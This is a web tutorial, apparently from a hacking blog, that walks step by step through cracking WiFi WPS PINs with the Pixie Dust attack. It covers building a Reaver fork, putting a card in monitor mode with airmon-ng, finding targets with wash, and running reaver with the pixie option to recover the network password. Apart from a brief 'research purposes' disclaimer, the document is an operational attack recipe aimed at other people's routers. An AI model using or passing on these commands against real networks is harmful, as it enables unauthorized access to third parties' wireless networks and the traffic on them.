Hack WiFi via WPS Pixie Dust Attack

Hack WiFi via WPS Pixie Dust Attack

 

This tutorial is only for researching purposes. Please note, this attack is very specific in nature and it’s success depends on a chipset’s type. This tutorial might not be useful against all routers. Kali Linux is required!

 

In this tutorial we will show you how to use Pixie Dust Attack to hack wifi by cracking WPS password.

Step 1: Dependencies

Make sure that you have all following dependencies updated:

  1. Go to terminal and type: apt-get update
  2. apt-get install build-essential
  3. apt-get install libpcap-dev
  4. apt-get install sqlite3
  5. apt-get install libsqlite3-dev
  6. apt-get install pixiewps

Step 2: GitHub Fork

You will need to download, compile and install Reaver, from GitHub. Issue git clone https://github.com/t6x/reaver-wps-fork-t6x

Step 3: Install

From your pwd, type…

  1. cd reaver-wps-fork-t6x/
  2. cd src/
  3. ./configure
  4. make
  5. make install

or  use ‘sudo make install’ if you are not a root user.

Step 4: Monitor Mode

Put your interface into monitor mode via airmon-ng:

airmon-ng start wlan0

Use your wireless card number instead of wlan0

Step 5: Find a Potential Target

The easiest way to find a target with WPS enabled is by using following command:

wash -i mon0

Which will give BSSID Channel RSSI WPS Version WPS Locked and ESSID info.

We are going to need BSSID and Channel sequence. BSSID looks like this

XX:XX:XX:XX:XX:XX

Channel sequence should be a number.

Step 6: Attacking

Once you have gathered all the information, just type following command in terminal:

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c {Channel} -vvv -K 1 -f

Step 7: Success!

The password will be shown on the right side of the password field! This attack is not compatible with all routers.Pixie Dust needs maximum 40 minutes for an attack while others might require several hours.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.